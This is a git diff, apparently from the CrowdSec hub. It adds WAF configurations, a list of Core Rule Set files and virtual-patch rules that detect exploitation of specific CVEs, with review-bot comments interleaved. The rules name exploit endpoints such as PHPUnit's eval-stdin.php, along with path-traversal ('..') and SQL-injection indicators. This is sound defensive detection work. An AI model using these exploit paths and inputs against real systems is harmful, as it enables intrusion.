+ "digest": "59393376cbcfb85cd7e609c5fe2c958aa60c519d7ff0ee310f1bab2af01d38e9",
+ "deprecated": false
+ },
+ "0.3": {
+ "digest": "47b3cd0887f58785c2b6a064f4da46e36a17a6e7d34c4893b0bd8308271fe0be",
+ "deprecated": false
+ }
+ },
+ "content": "IyBqdXN0IGNvdW50IGRpc3RpbmN0IG51bWJlciBvZiByZXF1ZXN0cyBnZXR0aW5nIGJsb2NrZWQKdHlwZTogbGVha3kKZmlsdGVyOiBldnQuUGFyc2VkLnByb2dyYW0gPT0gJ2Nyb3dkc2VjLXdhYXAnICYmIGV2dC5BcHBzZWMuSGFzSW5CYW5kTWF0Y2hlcyA9PSBmYWxzZSAmJiBldnQuUGFyc2VkLmFjdGlvbiBpbiBbImRlbnkiLCAiZHJvcCJdCm5hbWU6IGNyb3dkc2VjdXJpdHkvY3Jvd2RzZWMtYXBwc2VjLW91dG9mYmFuZApkZXNjcmlwdGlvbjogSVAgaGFzIHRyaWdnZXJlZCBtb3JlIHRoYW4gNSBDcm93ZFNlYyBPdXQgT2YgQmFuZCBXYWFwIHJ1bGVzCmJsYWNraG9sZTogMm0KbGVha3NwZWVkOiAzMHMKY2FwYWNpdHk6IDUKbGFiZWxzOgogIHR5cGU6IGV4cGxvaXQKICByZW1lZGlhdGlvbjogdHJ1ZQpncm91cGJ5OiAiZXZ0Lk1ldGEuc291cmNlX2lwIgojLS0tCiMgYXQgbGVhc3QgcmVxdWVzdHMgYmxvY2tlZCBvbiAzIGRpc3RpbmN0IFVSSXMKI3R5cGU6IGxlYWt5CiNkZWJ1ZzogdHJ1ZQojZmlsdGVyOiBldnQuUGFyc2VkLnByb2dyYW0gPT0gJ2Nyb3dkc2VjLXdhYXAnICYmIGV2dC5QYXJzZWQuYWN0aW9uID09ICJkZW55IgojbmFtZTogY3Jvd2RzZWN1cml0eS93YWYtcHJvYmluZwojZGVzY3JpcHRpb246ICJXQUYgcHJvYmluZyIKI2JsYWNraG9sZTogMm0KI2xlYWtzcGVlZDogNjBzCiNjYXBhY2l0eTogNQojZ3JvdXBieTogImV2dC5NZXRhLnNvdXJjZV9pcCArIGV2dC5QYXJzZWQudGFyZ2V0X3VyaSIKI2xhYmVsczoKIyAgdHlwZTogZXhwbG9pdAojICByZW1lZGlhdGlvbjogdHJ1ZQojLS0tCiMgIyBhdCBsZWFzdCA1IHJlcXVlc3RzIGJsb2NrZWQgd2l0aCAqKmRpc3RpbmN0KiogSURzCiN0eXBlOiBjb25kaXRpb25hbAojZGVidWc6IHRydWUKI25hbWU6IGNyb3dkc2VjdXJpdHkveHNzLXByb2JpbmcKI2Rlc2NyaXB0aW9uOiBhdCBsZWFzdCA1IGRpZmZlcmVudCBYU1MgcnVsZXMKI2ZpbHRlcjogZXZ0LlBhcnNlZC5wcm9ncmFtID09ICdjcm93ZHNlYy13YWFwJyAmJiBldnQuUGFyc2VkLmFjdGlvbiA9PSAiZGVueSIKI2NvbmRpdGlvbjogbGVuKCBkaXN0aW5jdCggbWVyZ2UoIGFsbChldnQuUXVldWUsIHsgIy5XYWFwLkdldElEcygpfSkgKSApICkgPiA1CiNjb25kaXRpb246IHwKIyAgTG9nSW5mbygiJSt2IiwgRmxhdHRlbkRpc3RpbmN0KCAKIyAgICAgIG1hcCggcXVldWUuUXVldWUsIAojICAgICAgIy5XYWFwLkJ5VGFnUngoIi4qeHNzLioiKS5HZXRSdWxlSURzKCkKIyAgICAgICkgCiMgICAgKSkgJiYKIyAgbGVuKCAKIyAgICBGbGF0dGVuRGlzdGluY3QoIAojICAgICAgbWFwKCBxdWV1ZS5RdWV1ZSwgCiMgICAgICAjLldhYXAuQnlUYWdSeCgiLip4c3MuKiIpLkdldFJ1bGVJRHMoKQojICAgICAgKSAKIyAgICApKSA+IDUKI2NvbmRpdGlvbjogJ0Rpc3RhbmNlKCJhYSIsICJiYiIsICJjYyIsIHsgIy5QYXJzZWQudG90byA9PSAxIH0pJwojY2FwYWNpdHk6IC0xCiNjYWNoZV9zaXplOiAxMDAwCiNsZW
Frc3BlZWQ6IDMwcwojZGlzdGluY3Q6IGV2dC5NZXRhLnNvdXJjZV9pcA==",
+ "description": "IP has triggered more than 5 CrowdSec Out Of Band Waap rules",
+ "author": "crowdsecurity",
+ "labels": {
+ "remediation": true,
+ "type": "exploit"
+ }
+ },
"crowdsecurity/dovecot-spam": {
"path": "scenarios/crowdsecurity/dovecot-spam.yaml",
"version": "0.4",
diff --git a/README.md b/README.md
index 11f356cc69c..69b32781ed5 100644
--- a/README.md
+++ b/README.md
@@ -1,4 +1,3 @@
-
@@ -6,6 +5,7 @@
+
@@ -15,7 +15,6 @@
:speech_balloon: Gitter (Live chat)
-
> CrowdSec Hub for parsers, enrichers and scenarios.
# Foreword
@@ -30,20 +29,17 @@ Feel free to use the parsers/scenarios here as a source of inspiration.
`cscli` provides a `hubtest` sub-command to help contributors to create tests for parsers and scenarios.
-
## View & use existing tests
:warning: most of `cscli hubtest` commands are expected to be run from the root directory of the hub. A git clone of this repository is the easier way to work :warning:
> list existing tests
-`cscli hubtest list`
-
+`cscli hubtest list`
> run a specific test
-`cscli hubtest run [test-name]`
-
+`cscli hubtest run [test-name]`
> show current tests coverage
@@ -52,8 +48,9 @@ Feel free to use the parsers/scenarios here as a source of inspiration.
## Create your own (parser) test
We're going to create the CI tests for the dovecot-parser. Before you start :
- - you will need some *actual* logs
- - you'd better know if the service logs on its own or via syslog (we're in the later case here)
+
+- you will need some _actual_ logs
+- you'd better know if the service logs on its own or via syslog (we're in the later case here)
1. Create a new test
@@ -71,9 +68,9 @@ We're going to create the CI tests for the dovecot-parser. Before you start :
What is relevant here is that every test is composed of :
- - A log file and it's associated type (same `type` as seen in acquis `labels:type`)
- - A configuration specifying which parsers and/or scenarios must be enabled for the test
- - A *ultimately* list of assertions that must be run against the parsers and/or scenarios output
+- A log file and it's associated type (same `type` as seen in acquis `labels:type`)
+- A configuration specifying which parsers and/or scenarios must be enabled for the test
+- A _ultimately_ list of assertions that must be run against the parsers and/or scenarios output
Note: You can provide the parsers and scenarios you want in your test with `--parsers` and `--scenarios` (you can provide multiple parsers and scenarios)
@@ -81,7 +78,6 @@ If you want to test only a scenario, you can specify (`--ignore-parsers`) or set
2. Configure your test
-
We need to edit the test configuration to use the relevant parsers :
```bash
@@ -102,20 +98,20 @@ _note: the order doesn't matter. If the parser name is in the form `author/parse
Now we need to dump some actual logs into the test's log file :
```bash
-▶ cat > .tests/dovecot-logs/dovecot-logs.log
+▶ cat > .tests/dovecot-logs/dovecot-logs.log
Jan 28 10:16:13 dovecot-box dovecot[7508]: imap-login: Disconnected (auth failed, 1 attempts in 6 secs): user=, method=PLAIN, rip=4.4.4.4, lip=7.7.7.7, TLS, session=<3650VvK5bdIaW-iK>
Sep 8 07:16:29 canyon dovecot: auth-worker(24058): pam(toto,1.1.1.1,): pam_authenticate() failed: Authentication failure (password mismatch?)
Sep 8 07:46:51 canyon dovecot: auth-worker(24544): pam(toto,1.1.1.1): unknown user
```
-
3. Run the test for the first time
Now that we have config & logs, let's run it for the first time :
```bash
▶ cscli hubtest run dovecot-logs
+
INFO[27-09-2021 06:13:59 PM] Running test 'dovecot-logs'
INFO[27-09-2021 06:13:59 PM] parser 'crowdsecurity/dovecot-logs' installed successfully in runtime environment
INFO[27-09-2021 06:13:59 PM] parser 'crowdsecurity/syslog-logs' installed successfully in runtime environment
@@ -144,9 +140,8 @@ results["s01-parse"]["crowdsecurity/dovecot-logs"][0].Evt.Meta["source_ip"] == "
As our `parser.assert` is empty, the tool is generating some "suggested" asserts for us.
Your careful eye will keep only the ones relevant to the parser you're testing :
-
```bash
-▶ cat > .tests/dovecot-logs/parser.assert
+▶ cat > .tests/dovecot-logs/parser.assert
results["s01-parse"]["crowdsecurity/dovecot-logs"][0].Success == true
results["s01-parse"]["crowdsecurity/dovecot-logs"][0].Evt.Parsed["pid"] == "7508"
results["s01-parse"]["crowdsecurity/dovecot-logs"][0].Evt.Parsed["timestamp"] == "Jan 28 10:16:13"
@@ -188,11 +183,8 @@ results["s01-parse"]["crowdsecurity/dovecot-logs"][2].Evt.Meta["datasource_path"
results["s01-parse"]["crowdsecurity/dovecot-logs"][2].Evt.Meta["datasource_type"] == "file"
```
-
-
4. Test your newly crafted test
-
```bash
▶ cscli hubtest run dovecot-logs
INFO[27-09-2021 06:19:33 PM] Running test 'dovecot-logs'
@@ -203,17 +195,14 @@ Test 'dovecot-logs' passed successfully (39 assertions) 🟩
And be amazed.
-
-
## Debug your own (parser) test
Things went wrong ? Don't panic
When working on a test, you can as well pass expressions directly to `hubtest` command and see the results :
-
```bash
-▶ cscli hubtest eval dovecot-logs -e 'results["s01-parse"]["crowdsecurity/dovecot-logs"][2].Evt.Parsed'
+▶ cscli hubtest eval dovecot-logs -e 'results["s01-parse"]["crowdsecurity/dovecot-logs"][2].Evt.Parsed'
dovecot_login_result: unknown user
dovecot_remote_ip: 1.1.1.1
dovecot_user: toto
@@ -230,7 +219,3 @@ timestamp8601: ""
## Open your PR
yes.
-
-
-
-
diff --git a/appsec-configs/crowdsecurity/crs.yaml b/appsec-configs/crowdsecurity/crs.yaml
new file mode 100644
index 00000000000..240b0f04d2f
--- /dev/null
+++ b/appsec-configs/crowdsecurity/crs.yaml
@@ -0,0 +1,5 @@
+name: crowdsecurity/crs
+default_remediation: ban
+#log_level: debug
+outofband_rules:
+ - crowdsecurity/crs
\ No newline at end of file
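Review bot: The file is committed without a trailing newline (`\ No newline at end of file`), and the same is true of appsec-rules/crowdsecurity/crs.yaml and every new vpatch-CVE-*.yaml in this commit; adding the final newline keeps later diffs to the last line from showing a spurious change. The commented `#log_level: debug` is fine to keep, but a short comment saying that `default_remediation` only applies when a rule in `outofband_rules` fires (if that is the intended semantics) would help readers who compare this file with virtual-patching.yaml.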
diff --git a/appsec-configs/crowdsecurity/virtual-patching.yaml b/appsec-configs/crowdsecurity/virtual-patching.yaml
new file mode 100644
index 00000000000..d3d26bb7c5b
--- /dev/null
+++ b/appsec-configs/crowdsecurity/virtual-patching.yaml
@@ -0,0 +1,8 @@
+name: crowdsecurity/virtual-patching
+default_remediation: ban
+#log_level: debug
+inband_rules:
+ - crowdsecurity/base-config
+ - crowdsecurity/vpatch-*
+# inband_options:
+# disable_body_inspection: true
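Review bot: The order of `inband_rules` looks load-bearing and is undocumented: `crowdsecurity/base-config` selects the request body processor, and the `vpatch-*` rules that read `BODY_ARGS` (json.* variables) presumably only see parsed data once that processor is set. If evaluation order follows list order, a comment such as `# base-config must stay first: it selects the body processor the BODY_ARGS-based vpatch rules depend on` would stop someone from reordering or removing it. The `vpatch-*` glob also silently picks up any future rule with that prefix, which may be intended but is worth stating in the same comment.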
diff --git a/appsec-rules/crowdsecurity/base-config.yaml b/appsec-rules/crowdsecurity/base-config.yaml
new file mode 100644
index 00000000000..e8510465c8c
--- /dev/null
+++ b/appsec-rules/crowdsecurity/base-config.yaml
@@ -0,0 +1,11 @@
+name: crowdsecurity/base-config
+#### This file is intended to provide a basic configuration for coraza:
+#### - Set the body processors based on the content-type
+
+seclang_rules:
+ - Secrule REQUEST_HEADERS:Content-Type "@rx ^application/x-www-form-urlencoded" "id:100,phase:1,pass,nolog,noauditlog,ctl:requestBodyProcessor=URLENCODED"
+ - Secrule REQUEST_HEADERS:Content-Type "@rx ^multipart/form-data" "id:101,phase:1,pass,nolog,noauditlog,ctl:requestBodyProcessor=MULTIPART"
+ - Secrule REQUEST_HEADERS:Content-Type "@rx ^application/xml" "id:102,phase:1,pass,nolog,noauditlog,ctl:requestBodyProcessor=XML"
+ - Secrule REQUEST_HEADERS:Content-Type "@rx ^application/json" "id:103,phase:1,pass,nolog,noauditlog,ctl:requestBodyProcessor=JSON"
+ - Secrule REQUEST_HEADERS:Content-Type "@rx ^text/xml" "id:104,phase:1,pass,nolog,noauditlog,ctl:requestBodyProcessor=XML"
+ - SecRule REQBODY_PROCESSOR "!@rx (?:URLENCODED|MULTIPART|XML|JSON)" "id:105,phase:1,pass,nolog,noauditlog,ctl:requestBodyProcessor=RAW" #Use our custom RAW body processor, just to have REQUEST_BODY set
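Review bot: The Content-Type regexes in rules 100-104 are case-sensitive, so a header spelled `Application/JSON` or with unusual casing falls through to rule 105 and gets the RAW processor, which leaves `BODY_ARGS` empty for the vpatch rules that rely on it even though most backends parse media types case-insensitively. Prefixing each pattern with an inline flag, e.g. `"@rx (?i)^application/json"`, closes that gap without changing the rule ids; a `t:lowercase` transform on the variable would be the alternative. Separately, the directive name is written `Secrule` on rules 100-104 and `SecRule` on 105; using `SecRule` throughout keeps the file consistent even if the parser accepts both.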
diff --git a/appsec-rules/crowdsecurity/crs.yaml b/appsec-rules/crowdsecurity/crs.yaml
new file mode 100644
index 00000000000..720bea0d27a
--- /dev/null
+++ b/appsec-rules/crowdsecurity/crs.yaml
@@ -0,0 +1,180 @@
+name: crowdsecurity/crs
+seclang_rules:
+ - SecRuleEngine On
+ - SecRequestBodyAccess On
+seclang_files_rules:
+ - crs-setup.conf
+ - REQUEST-901-INITIALIZATION.conf
+ - REQUEST-905-COMMON-EXCEPTIONS.conf
+ - REQUEST-911-METHOD-ENFORCEMENT.conf
+ - REQUEST-913-SCANNER-DETECTION.conf
+ - REQUEST-920-PROTOCOL-ENFORCEMENT.conf
+ - REQUEST-921-PROTOCOL-ATTACK.conf
+ - REQUEST-922-MULTIPART-ATTACK.conf
+ - REQUEST-930-APPLICATION-ATTACK-LFI.conf
+ - REQUEST-931-APPLICATION-ATTACK-RFI.conf
+ - REQUEST-932-APPLICATION-ATTACK-RCE.conf
+ - REQUEST-933-APPLICATION-ATTACK-PHP.conf
+ - REQUEST-934-APPLICATION-ATTACK-GENERIC.conf
+ - REQUEST-941-APPLICATION-ATTACK-XSS.conf
+ - REQUEST-942-APPLICATION-ATTACK-SQLI.conf
+ - REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION.conf
+ - REQUEST-944-APPLICATION-ATTACK-JAVA.conf
+ - REQUEST-949-BLOCKING-EVALUATION.conf
+ - RESPONSE-950-DATA-LEAKAGES.conf
+ - RESPONSE-951-DATA-LEAKAGES-SQL.conf
+ - RESPONSE-952-DATA-LEAKAGES-JAVA.conf
+ - RESPONSE-953-DATA-LEAKAGES-PHP.conf
+ - RESPONSE-954-DATA-LEAKAGES-IIS.conf
+ - RESPONSE-955-WEB-SHELLS.conf
+ - RESPONSE-959-BLOCKING-EVALUATION.conf
+ - RESPONSE-980-CORRELATION.conf
+
+data:
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/crs-setup.conf
+ dest_file: crs-setup.conf
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/REQUEST-901-INITIALIZATION.conf
+ dest_file: REQUEST-901-INITIALIZATION.conf
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/REQUEST-905-COMMON-EXCEPTIONS.conf
+ dest_file: REQUEST-905-COMMON-EXCEPTIONS.conf
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/REQUEST-911-METHOD-ENFORCEMENT.conf
+ dest_file: REQUEST-911-METHOD-ENFORCEMENT.conf
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/REQUEST-913-SCANNER-DETECTION.conf
+ dest_file: REQUEST-913-SCANNER-DETECTION.conf
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/REQUEST-920-PROTOCOL-ENFORCEMENT.conf
+ dest_file: REQUEST-920-PROTOCOL-ENFORCEMENT.conf
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/REQUEST-921-PROTOCOL-ATTACK.conf
+ dest_file: REQUEST-921-PROTOCOL-ATTACK.conf
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/REQUEST-922-MULTIPART-ATTACK.conf
+ dest_file: REQUEST-922-MULTIPART-ATTACK.conf
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/REQUEST-930-APPLICATION-ATTACK-LFI.conf
+ dest_file: REQUEST-930-APPLICATION-ATTACK-LFI.conf
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/REQUEST-931-APPLICATION-ATTACK-RFI.conf
+ dest_file: REQUEST-931-APPLICATION-ATTACK-RFI.conf
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/REQUEST-932-APPLICATION-ATTACK-RCE.conf
+ dest_file: REQUEST-932-APPLICATION-ATTACK-RCE.conf
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/REQUEST-933-APPLICATION-ATTACK-PHP.conf
+ dest_file: REQUEST-933-APPLICATION-ATTACK-PHP.conf
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/REQUEST-934-APPLICATION-ATTACK-GENERIC.conf
+ dest_file: REQUEST-934-APPLICATION-ATTACK-GENERIC.conf
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/REQUEST-941-APPLICATION-ATTACK-XSS.conf
+ dest_file: REQUEST-941-APPLICATION-ATTACK-XSS.conf
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/REQUEST-942-APPLICATION-ATTACK-SQLI.conf
+ dest_file: REQUEST-942-APPLICATION-ATTACK-SQLI.conf
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION.conf
+ dest_file: REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION.conf
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/REQUEST-944-APPLICATION-ATTACK-JAVA.conf
+ dest_file: REQUEST-944-APPLICATION-ATTACK-JAVA.conf
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/REQUEST-949-BLOCKING-EVALUATION.conf
+ dest_file: REQUEST-949-BLOCKING-EVALUATION.conf
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/RESPONSE-950-DATA-LEAKAGES.conf
+ dest_file: RESPONSE-950-DATA-LEAKAGES.conf
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/RESPONSE-951-DATA-LEAKAGES-SQL.conf
+ dest_file: RESPONSE-951-DATA-LEAKAGES-SQL.conf
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/RESPONSE-952-DATA-LEAKAGES-JAVA.conf
+ dest_file: RESPONSE-952-DATA-LEAKAGES-JAVA.conf
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/RESPONSE-953-DATA-LEAKAGES-PHP.conf
+ dest_file: RESPONSE-953-DATA-LEAKAGES-PHP.conf
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/RESPONSE-954-DATA-LEAKAGES-IIS.conf
+ dest_file: RESPONSE-954-DATA-LEAKAGES-IIS.conf
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/RESPONSE-955-WEB-SHELLS.conf
+ dest_file: RESPONSE-955-WEB-SHELLS.conf
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/RESPONSE-959-BLOCKING-EVALUATION.conf
+ dest_file: RESPONSE-959-BLOCKING-EVALUATION.conf
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/RESPONSE-980-CORRELATION.conf
+ dest_file: RESPONSE-980-CORRELATION.conf
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/crawlers-user-agents.data
+ dest_file: crawlers-user-agents.data
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/iis-errors.data
+ dest_file: iis-errors.data
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/java-classes.data
+ dest_file: java-classes.data
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/java-code-leakages.data
+ dest_file: java-code-leakages.data
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/java-errors.data
+ dest_file: java-errors.data
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/lfi-os-files.data
+ dest_file: lfi-os-files.data
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/php-config-directives.data
+ dest_file: php-config-directives.data
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/php-errors.data
+ dest_file: php-errors.data
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/php-errors-pl2.data
+ dest_file: php-errors-pl2.data
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/php-function-names-933150.data
+ dest_file: php-function-names-933150.data
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/php-function-names-933151.data
+ dest_file: php-function-names-933151.data
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/php-variables.data
+ dest_file: php-variables.data
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/restricted-files.data
+ dest_file: restricted-files.data
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/restricted-upload.data
+ dest_file: restricted-upload.data
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/scanners-headers.data
+ dest_file: scanners-headers.data
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/scanners-urls.data
+ dest_file: scanners-urls.data
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/scanners-user-agents.data
+ dest_file: scanners-user-agents.data
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/scripting-user-agents.data
+ dest_file: scripting-user-agents.data
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/sql-errors.data
+ dest_file: sql-errors.data
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/ssrf.data
+ dest_file: ssrf.data
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/unix-shell.data
+ dest_file: unix-shell.data
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/web-shells-php.data
+ dest_file: web-shells-php.data
+ type: modsec
+ - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/windows-powershell-commands.data
+ dest_file: windows-powershell-commands.data
+ type: modsec
\ No newline at end of file
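Review bot: Every `source_url` fetches from the `waf-rules` ref of the sec-lists repository, which appears to be a branch rather than a tag or commit, so the CRS files and `.data` lists an installation pulls can change without this rule file or its hub digest changing. For a ruleset that decides on bans, pinning to an immutable ref (a tag or commit SHA) or recording an expected checksum per `dest_file` would make installs reproducible and let a changed upstream be noticed. A comment on the `data:` block stating which upstream CRS version these files correspond to would help as well.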
diff --git a/appsec-rules/crowdsecurity/vpatch-CVE-2017-9841.yaml b/appsec-rules/crowdsecurity/vpatch-CVE-2017-9841.yaml
new file mode 100644
index 00000000000..68ffa64338f
--- /dev/null
+++ b/appsec-rules/crowdsecurity/vpatch-CVE-2017-9841.yaml
@@ -0,0 +1,23 @@
+name: crowdsecurity/vpatch-CVE-2017-9841
+description: "Detect CVE-2017-9841 exploits "
+rules:
+ - and:
+ - zones:
+ - URI
+ transform:
+ - lowercase
+ match:
+ type: endsWith
+ value: /util/php/eval-stdin.php
+labels:
+ type: exploit
+ service: http
+ confidence: 3
+ spoofable: 0
+ behavior: "http:exploit"
+ label: "PHPUnit RCE (CVE-2017-9841)"
+ classification:
+ - cve.CVE-2017-9841
+ - attack.T1595
+ - attack.T1190
+ - cwe.CWE-94
\ No newline at end of file
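Review bot: The `endsWith` match on the `URI` zone only holds if that zone carries the path without the query string; should it include the query, a request for the same script with any parameters appended would not match, and the nuclei test in .appsec-tests only exercises the bare path. Please confirm what `URI` contains and, if it includes the query, switch to `type: contains` or a regex anchored on the path segment. The same question applies to the other `endsWith` rules in this commit (CVE-2019-12989, CVE-2020-11738, CVE-2021-22941, CVE-2021-3129, CVE-2022-27926, CVE-2022-35914, CVE-2022-44877, CVE-2022-46169, CVE-2023-20198). The trailing space inside `"Detect CVE-2017-9841 exploits "` is repeated in every vpatch description and can be dropped.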
diff --git a/appsec-rules/crowdsecurity/vpatch-CVE-2019-12989.yaml b/appsec-rules/crowdsecurity/vpatch-CVE-2019-12989.yaml
new file mode 100644
index 00000000000..6611e1ed838
--- /dev/null
+++ b/appsec-rules/crowdsecurity/vpatch-CVE-2019-12989.yaml
@@ -0,0 +1,43 @@
+name: crowdsecurity/vpatch-CVE-2019-12989
+description: "Detect CVE-2019-12989 exploits "
+rules:
+ - and:
+ - zones:
+ - METHOD
+ match:
+ type: equals
+ value: POST
+ - zones:
+ - URI
+ transform:
+ - lowercase
+ match:
+ type: endsWith
+ value: /sdwan/nitro/v1/config/get_package_file
+ - zones:
+ - ARGS
+ variables:
+ - action
+ transform:
+ - lowercase
+ match:
+ type: equals
+ value: "file_download"
+ - zones:
+ - BODY_ARGS
+ variables:
+ - json.get_package_file.site_name
+ match:
+ type: libinjectionSQL
+labels:
+ type: exploit
+ service: http
+ confidence: 3
+ spoofable: 0
+ behavior: "http:exploit"
+ label: "citrix SQLi (CVE-2019-12989)"
+ classification:
+ - cve.CVE-2019-12989
+ - attack.T1595
+ - attack.T1190
+ - cwe.CWE-89
\ No newline at end of file
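Review bot: The last `and` branch reads `BODY_ARGS` variable `json.get_package_file.site_name`, which only exists when the JSON body processor has been selected by `crowdsecurity/base-config`; if a deployment lists this rule without base-config, the branch never matches and the rule is silently inert. A comment on that branch such as `# requires the JSON body processor from crowdsecurity/base-config` would make the dependency visible. The rule also requires all four conditions, so a request that omits `action=file_download` but carries the same SQL payload is not reported; that may be deliberate, but it is worth stating next to the `ARGS` branch.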
diff --git a/appsec-rules/crowdsecurity/vpatch-CVE-2020-11738.yaml b/appsec-rules/crowdsecurity/vpatch-CVE-2020-11738.yaml
new file mode 100644
index 00000000000..d42fbef1ca2
--- /dev/null
+++ b/appsec-rules/crowdsecurity/vpatch-CVE-2020-11738.yaml
@@ -0,0 +1,37 @@
+name: crowdsecurity/vpatch-CVE-2020-11738
+description: "Detect CVE-2020-11738 exploits "
+rules:
+ - and:
+ - zones:
+ - URI
+ transform:
+ - lowercase
+ match:
+ type: endsWith
+ value: /wp-admin/admin-ajax.php
+ - zones:
+ - ARGS
+ variables:
+ - action
+ match:
+ type: equals
+ value: duplicator_download
+ - zones:
+ - ARGS
+ variables:
+ - file
+ match:
+ type: contains
+ value: ".."
+labels:
+ type: exploit
+ service: http
+ confidence: 3
+ spoofable: 0
+ behavior: "http:exploit"
+ label: "Wordpress Snap Creek Duplicator (CVE-2020-11738)"
+ classification:
+ - cve.CVE-2020-11738
+ - attack.T1595
+ - attack.T1190
+ - cwe.CWE-22
\ No newline at end of file
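Review bot: The `ARGS` `action` comparison has no `lowercase` transform, unlike the equivalent branch in vpatch-CVE-2019-12989 where `action` is lowercased before `equals`; WordPress dispatches `action` case-sensitively so this is likely harmless, but adding `transform: - lowercase` here keeps the rules consistent and costs nothing. The `file` branch matches on `..` only, which assumes the `ARGS` zone is already URL-decoded; if it is not, a comment saying so would help the next reader.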
diff --git a/appsec-rules/crowdsecurity/vpatch-CVE-2021-22941.yaml b/appsec-rules/crowdsecurity/vpatch-CVE-2021-22941.yaml
new file mode 100644
index 00000000000..54dc411a9e1
--- /dev/null
+++ b/appsec-rules/crowdsecurity/vpatch-CVE-2021-22941.yaml
@@ -0,0 +1,35 @@
+name: crowdsecurity/vpatch-CVE-2021-22941
+description: "Detect CVE-2021-22941 exploits "
+rules:
+ - and:
+ - zones:
+ - METHOD
+ match:
+ type: equals
+ value: POST
+ - zones:
+ - URI
+ transform:
+ - lowercase
+ match:
+ type: endsWith
+ value: /upload.aspx
+ - zones:
+ - ARGS
+ variables:
+ - uploadid
+ match:
+ type: contains
+ value: ".."
+labels:
+ type: exploit
+ service: http
+ confidence: 3
+ spoofable: 0
+ behavior: "http:exploit"
+ label: "Citrix RCE (CVE-2021-22941)"
+ classification:
+ - cve.CVE-2021-22941
